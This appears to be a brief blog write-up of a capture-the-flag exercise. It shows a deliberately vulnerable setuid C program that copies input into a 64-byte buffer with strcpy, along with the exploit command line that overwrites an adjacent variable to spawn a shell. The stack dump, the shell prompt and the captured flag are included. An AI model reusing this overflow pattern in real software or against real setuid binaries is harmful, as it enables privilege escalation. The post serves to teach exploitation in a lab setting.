# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
$ cat simple_overwrite.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include "dump_stack.h" void vuln(int tmp, char *str) { int win = tmp; char buf[64]; strcpy(buf, str); dump_stack((void **) buf, 23, (void **) &tmp); printf("win = %d\n", win); if (win == 1) { execl("/bin/sh", "sh", NULL); } else { printf("Sorry, you lose.\n"); } exit(0); } int main(int argc, char **argv) { if (argc != 2) { printf("Usage: stack_overwrite [str]\n"); return 1; } uid_t euid = geteuid(); setresuid(euid, euid, euid); vuln(0, argv[1]); return 0; } $ ./simple_overwrite `python -c 'print "\x90"*64 + "\x01"'` Stack dump: 0xffffd614: 0xffffd80f (second argument) 0xffffd610: 0x00000000 (first argument) 0xffffd60c: 0x0804870f (saved eip) 0xffffd608: 0xffffd638 (saved ebp) 0xffffd604: 0xf7fcbff4 0xffffd600: 0x00001f4d 0xffffd5fc: 0x00000001 0xffffd5f8: 0x90909090 0xffffd5f4: 0x90909090 0xffffd5f0: 0x90909090 0xffffd5ec: 0x90909090 0xffffd5e8: 0x90909090 0xffffd5e4: 0x90909090 0xffffd5e0: 0x90909090 0xffffd5dc: 0x90909090 0xffffd5d8: 0x90909090 0xffffd5d4: 0x90909090 0xffffd5d0: 0x90909090 0xffffd5cc: 0x90909090 0xffffd5c8: 0x90909090 0xffffd5c4: 0x90909090 0xffffd5c0: 0x90909090 0xffffd5bc: 0x90909090 (beginning of buffer) win = 1 sh-4.2$ cat key overflow_is_best_flow
cat simple_overwrite.c
./simple_overwrite `python -c 'print "\x90"*64 + "\x01"'`
cat key
Post a Comment
No comments:
Post a Comment